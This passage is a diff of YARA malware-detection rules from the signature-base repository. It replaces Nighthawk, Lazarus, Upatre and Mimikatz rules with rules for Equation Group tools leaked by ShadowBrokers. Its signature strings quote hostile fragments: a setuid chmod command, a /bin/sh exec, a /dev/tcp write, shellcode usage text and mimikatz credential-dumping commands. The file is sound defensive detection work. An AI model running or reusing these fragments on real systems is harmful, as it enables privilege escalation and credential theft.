-		reference = "https://web.archive.org/web/20221125224850/https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nighthawk_c2.yar#L32-L50"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L786-L799"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8dec7752ee6e1af87129ce7ac09130f94a20807c4f45ceb1fce434358ac727bf"
+		logic_hash = "94ab45d6c94c63c5c9c68ee3d509143af4eb574058c0cd4f26eed8058dbd9213"
 		score = 75
 		quality = 85
-		tags = "NIGHTHAWK, BEACON, FILE"
-		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
-		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
-		hash3 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
 
 	strings:
-		$s1 = { 44 8b ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d c0 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 20 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 00 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d e0 e8 [2] ff ff 33 d2 e9 ee 04 00 00 48 8d 44 24 68 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 8d 95 a0 00 00 00 ff 15 [2] 09 00 85 c0 0f 85 74 04 00 00 48 89 7c 24 28 48 89 7c 24 20 45 33 c9 45 33 c0 48 8d 15 [2] 0a 00 48 8b 4c 24 68 ff 15 [2] 09 00 85 }
-		$s2 = { 4d 85 c0 0f 84 83 00 00 00 49 21 18 33 d2 44 8d 43 01 33 c9 ff 15 [2] 08 00 48 8b f0 48 85 c0 74 6a 44 8d 43 04 48 8b d5 48 8b c8 ff 15 [2] 08 00 48 8b e8 48 85 c0 74 49 48 8d 44 24 70 33 d2 44 8d 4b 24 48 89 44 24 20 4c 8d 44 24 30 48 8b cd ff 15 [2] 08 00 8b }
-		$s3 = { 48 85 c0 0f 84 [2] 00 00 4d 8b cc 49 83 7c 24 18 08 72 04 4d 8b 0c 24 4d 8b c5 49 83 7d 18 08 72 04 4d 8b 45 00 49 8b ?? 49 83 ?? 18 08 72 03 49 8b }
-		$s4 = { 44 8b 44 24 44 4c 89 [2-3] 89 95 00 02 00 00 2b c7 8b d7 49 03 d0 48 03 d1 4c 8d 8d 00 02 00 00 44 8b c0 49 8b cf ff 15 [2] 04 00 33 d2 85 c0 0f 84 [2] ff ff 03 bd 00 02 00 00 8b 44 24 40 3b f8 48 8b 4d ?? 4c 8b }
+		$s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 60KB and all of ( $s* )
+		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_ACE_Containing_EXE
+rule SIGNATURE_BASE_Equationgroup_Estesfox
 {
 	meta:
-		description = "Looks for ACE Archives containing an exe/scr file"
-		author = "Florian Roth (Nextron Systems) - based on Nick Hoffman' rule - Morphick Inc"
-		id = "0756f0e7-39f1-572d-a77d-1f7826332360"
-		date = "2015-09-09"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f2e8b8ba-af09-5e7c-a99c-4f620a0917c9"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ace_with_exe.yar#L2-L20"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L801-L814"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27fba0db7a98fbaf4b3710a9e411ed74860099c133a2e83ddf368ae2fef3c288"
-		score = 50
-		quality = 83
+		logic_hash = "bfbc8ac62dcb61b492b1803de535f51ceb54ac83e45071270a6ef5faeaa521b2"
+		score = 75
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
 
 	strings:
-		$header = { 2a 2a 41 43 45 2a 2a }
-		$extensions1 = ".exe"
-		$extensions2 = ".EXE"
-		$extensions3 = ".scr"
-		$extensions4 = ".SCR"
+		$x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
 
 	condition:
-		$header at 7 and for any of ( $extensions* ) : ( $ in ( 81 .. ( 81 + uint16( 79 ) ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Gopuram_Apr23 : FILE
+rule SIGNATURE_BASE_Equationgroup_Elatedmonkey_1_0_1_1 : FILE
 {
 	meta:
-		description = "Detects Lazarus Gopuram malware"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e0bb43b0-542b-5c8e-bcba-0326f80efaa0"
-		date = "2023-04-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_gopuram.yar#L1-L16"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d8915305-2ed7-50b7-84d0-b139a6d3481a"
+		date = "2017-04-08"
+		modified = "2022-08-18"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L816-L832"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
-		hash = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
-		logic_hash = "58d978bd09a656f2a10a4d5d2585e51efe5cfb6b6648a4b3c2ce8c4f5d2256d4"
+		logic_hash = "756337ecb951357c5440ea2fe010982089539c35dc556288d61db6de22348c1f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
 
 	strings:
-		$path = "%s.TxR.0.regtrans-ms"
+		$s1 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
+		$s2 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
+		$s3 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
+		$s4 = "cat > /dev/tcp/127.0.0.1/80 <<" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $path and filesize < 10MB
+		filesize < 15KB and 2 of them
 }
-rule SIGNATURE_BASE_Upatre_Hazgurut : FILE
+rule SIGNATURE_BASE_Equationgroup_Scanner : FILE
 {
 	meta:
-		description = "Detects Upatre malware - file hazgurut.exe"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0040452-ed63-5e90-9ed6-4f05e7b4eadc"
-		date = "2015-10-13"
+		id = "b2f9c534-0ca7-5223-b85e-8e74c3cfa6ff"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_upatre_oct15.yar#L8-L45"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L834-L849"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "41dd2f615d1c75ef81073d26bfbdb4f5c6735d9a3ff6d543ca77d6e16fe7eb5b"
-		score = 70
+		logic_hash = "b0454fd41d3591fc5811da6407a422b7c28d0b923109cdfa85b337cc7fffb178"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
-		hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
-		hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
-		hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
-		hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
-		hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
-		hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
-		hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
-		hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
-		hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
-		hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
-		hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
-		hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
-		hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
+		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
 
 	strings:
-		$a1 = "barcod" fullword ascii
-		$s0 = "msports.dll" fullword ascii
-		$s1 = "nddeapi.dll" fullword ascii
-		$s2 = "glmf32.dll" fullword ascii
-		$s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
-		$s4 = "cmutil.dll" fullword ascii
-		$s5 = "mprapi.dll" fullword ascii
-		$s6 = "glmf32.dll" fullword ascii
+		$x1 = "program version netid     address             service         owner" fullword ascii
+		$x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
+		$x5 = "-scan winn %s one" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $a1 in ( 0 .. 4000 ) and all of ( $s* )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_1 : FILE
+rule SIGNATURE_BASE_Equationgroup__Ftshell_Ftshell_V3_10_3_0 : FILE
 {
 	meta:
-		description = "Detects Lazarus VHD Ransomware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5cb3c136-ec5c-5596-8dcc-e4c6ef33050a"
-		date = "2020-10-05"
+		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_vhd_ransomware.yar#L2-L24"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L853-L871"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "95c56c5111bb227da8f8a3f8aa4f23e1348bc76ff76a05fc3cae89f9fad1bb52"
+		logic_hash = "1eb7915fd057b2cc5f788ca11b3c71210ce5e7ac29c52790c249490435e62926"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
-		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
-		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
+		hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
 
 	strings:
-		$s1 = "HowToDecrypt.txt" wide fullword
-		$s2 = "rsa.cpp" wide fullword
-		$s3 = "sc stop \"Microsoft Exchange Compliance Service\"" ascii fullword
-		$op1 = { 8b 8d bc fc ff ff 8b 94 bd 34 03 00 00 33 c0 50 }
-		$op2 = { 8b 8d 98 f9 ff ff 8d 64 24 00 8b 39 3b bc 85 34 }
-		$op3 = { 8b 94 85 34 03 00 00 89 11 40 83 c1 04 3b 06 7c }
+		$s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
+		$s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
+		$s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
+		$s4 = "# ftshell -- File Transfer Shell" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
+		( uint16( 0 ) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_2 : FILE
+rule SIGNATURE_BASE_Equationgroup__Scanner_Scanner_V2_1_2 : FILE
 {
 	meta:
-		description = "Detects Lazarus VHD Ransomware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b75668de-93e6-57e7-90f0-fa335295be7c"
-		date = "2020-10-05"
+		id = "bf1f2119-f742-5106-96f0-de88755275ef"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_vhd_ransomware.yar#L26-L43"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L873-L892"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf28771a854b3bacc911375c09f6c6bc6ddebff95612a509890c56a5a14e8921"
+		logic_hash = "3c42aaacea1347fd64d7f91421f692e77e33e273d4c2e71806ef7f5f086aba11"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "097ca829e051a4877bca093cee340180ff5f13a9c266ad4141b0be82aae1a39b"
-		hash2 = "73a10be31832c9f1cbbd798590411009da0881592a90feb472e80025dfb0ea79"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
+		hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff"
 
 	strings:
-		$op1 = { f9 36 88 08 8d ad fc ff ff ff 66 ff c1 e9 72 86 }
-		$op2 = { c6 c4 58 0f a4 c8 12 8d ad ff ff ff ff 0f b6 44 }
-		$op3 = { 88 02 66 c1 f0 54 8d bf fc ff ff ff 0f ba e0 19 }
+		$s1 = "Welcome to the network scanning tool" fullword ascii
+		$s2 = "Scanning port %d" fullword ascii
+		$s3 = "/current/down/cmdout/scans" fullword ascii
+		$s4 = "Scan for SSH version" fullword ascii
+		$s5 = "program vers proto   port  service" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 100KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Mimikatz_Memory_Rule_1 : APT
+rule SIGNATURE_BASE_Equationgroup__Ghost_Sparc_Ghost_X86_3 : FILE
 {
 	meta:
-		description = "Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)"
-		author = "Florian Roth"
-		id = "55cc7129-5ea0-5545-a8f6-b5306a014dd0"
-		date = "2014-12-22"
-		modified = "2023-07-04"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L5-L26"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ccc9c9be-8f78-5071-a11e-47f994cf8f08"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L894-L912"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "22064af570b8e0a93ca0d45484848eda3fbecfd27c88247ef0897fe53be4b7fc"
-		score = 70
+		logic_hash = "c4ad8e06934c1ece520863951f14cbf86d1bc4bba97aede1d58def1e5c7df4eb"
+		score = 75
 		quality = 85
-		tags = "APT"
-		nodeepdive = 1
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1"
+		hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33"
 
 	strings:
-		$s1 = "sekurlsa::wdigest" fullword ascii
-		$s2 = "sekurlsa::logonPasswords" fullword ascii
-		$s3 = "sekurlsa::minidump" fullword ascii
-		$s4 = "sekurlsa::credman" fullword ascii
-		$fp1 = "\"x_mitre_version\": " ascii
-		$fp2 = "{\"type\":\"bundle\","
-		$fp3 = "use strict" ascii fullword
-		$fp4 = "\"url\":\"https://attack.mitre.org/" ascii
+		$x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" fullword ascii
+		$x2 = "Sending shellcode as part of an open command..." fullword ascii
+		$x3 = "cmdshellcode" fullword ascii
+		$x4 = "You will not be able to run the shellcode. Exiting..." fullword ascii
 
 	condition:
-		1 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x457f and filesize < 70KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Mimikatz : FILE
+rule SIGNATURE_BASE_Equationgroup__Pclean_V2_1_1_Pclean_V2_1_1_4 : FILE
 {
 	meta:
-		description = "mimikatz"
-		author = "Benjamin DELPY (gentilkiwi)"
-		id = "840a5b8c-a311-50bc-a099-6b8ab1492e12"
-		date = "2022-11-16"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ed4a3b3a-0935-533b-80dd-ee23b2e8df00"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L48-L74"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L914-L930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf972a2c0465c3bbdde6f03d91c6f479d0f66c6d3e9512355de5a973164b56a5"
+		logic_hash = "5622d6fff876fa5d07795491d14f0396378c1b07b69cf8bcabb5e0bd3c19e72a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		tool_author = "Benjamin DELPY (gentilkiwi)"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
+		hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd"
 
 	strings:
-		$exe_x86_1 = { 89 71 04 89 [0-3] 30 8d 04 bd }
-		$exe_x86_2 = { 8b 4d e? 8b 45 f4 89 75 e? 89 01 85 ff 74 }
-		$exe_x64_1 = { 33 ff 4? 89 37 4? 8b f3 45 85 c? 74}
-		$exe_x64_2 = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }
-		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
-		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
+		$s1 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
+		$s2 = "e.g.: -n 1-1024,1080,6666,31337 " fullword ascii
 
 	condition:
-		( all of ( $exe_x86_* ) ) or ( all of ( $exe_x64_* ) ) or ( any of ( $sys_* ) )
+		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_Wce
+rule SIGNATURE_BASE_Equationgroup__Jparsescan_Parsescan_5 : FILE
 {
 	meta:
-		description = "wce"
-		author = "Benjamin DELPY (gentilkiwi)"
-		id = "857981ee-3f57-580b-8bfd-8d2109298e27"
-		date = "2023-12-05"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan"
+		author = "Florian Roth (Nextron Systems)"
+		id = "964a4e49-9163-5dd6-bb2c-88fa39d5f356"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L76-L89"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L932-L950"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a16db99dcaaf1b6c33a738aab4f4d3812366258bc2f6dd32250ee1b1a0616f1c"
+		logic_hash = "719baa53db53f4cc4f3e9ed935814e42e5cb4b7fb8eaaa373feb73df69bfcde0"
 		score = 75
 		quality = 85
-		tags = ""
-		tool_author = "Hernan Ochoa (hernano)"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
+		hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
 
 	strings:
-		$hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 }
-		$hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 }
-		$hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 }
+		$s1 = "# default is to dump out all scanned hosts found" fullword ascii
+		$s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" fullword ascii
+		$s3 = "sadmind is available on two ports, this also works)" fullword ascii
+		$s4 = "-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scan" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x2123 and filesize < 40KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Power_Pe_Injection
+rule SIGNATURE_BASE_Equationgroup__Funnelout_V4_1_0_1 : FILE
 {
 	meta:
-		description = "PowerShell with PE Reflective Injection"
-		author = "Benjamin DELPY (gentilkiwi)"
-		id = "a71fe9f2-9c2a-5650-a5c7-116b76f10db6"
-		date = "2023-12-05"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b0c42b06-8314-5731-b333-59bb90785cf4"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L91-L101"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L952-L969"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64a7033d51e8933912f37ce68bffc216073a88cae1ea7492e71a812411ae6a9d"
+		logic_hash = "ae0b387725017de2766593ea55677dca36eee68107e0692a7d5e2526db74765b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash2 = "457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33"
 
 	strings:
-		$str_loadlib = "0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9"
+		$s1 = "header(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");" fullword ascii
+		$s2 = "if ($code =~ /proxyhost/) {" fullword ascii
+		$s3 = "\\$rk[1] = \\$rk[1] - 1;" ascii
+		$s4 = "#existsUser($u) or die \"User '$u' does not exist in database.\\n\";" fullword ascii
 
 	condition:
-		$str_loadlib
+		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Mimikatz_Logfile
+rule SIGNATURE_BASE_Equationgroup__Magicjack_V1_1_0_0_Client : FILE
 {
 	meta:
-		description = "Detects a log file generated by malicious hack tool mimikatz"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "921d85fc-fb4d-57ed-b4ac-203d5c6f1e8e"
-		date = "2015-03-31"
+		id = "be18f36c-3d6c-53a3-89b6-bfc53e1dd87d"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L103-L119"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L971-L988"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4591cda5bd5a555292087da26193accc4f00d7c0611be8d5ab6dd4dabb14a0ef"
-		score = 80
+		logic_hash = "5e22b01aa9b1283fa7a326b7c0f8047ed373fac750c89e9ba02c49f0f454e275"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
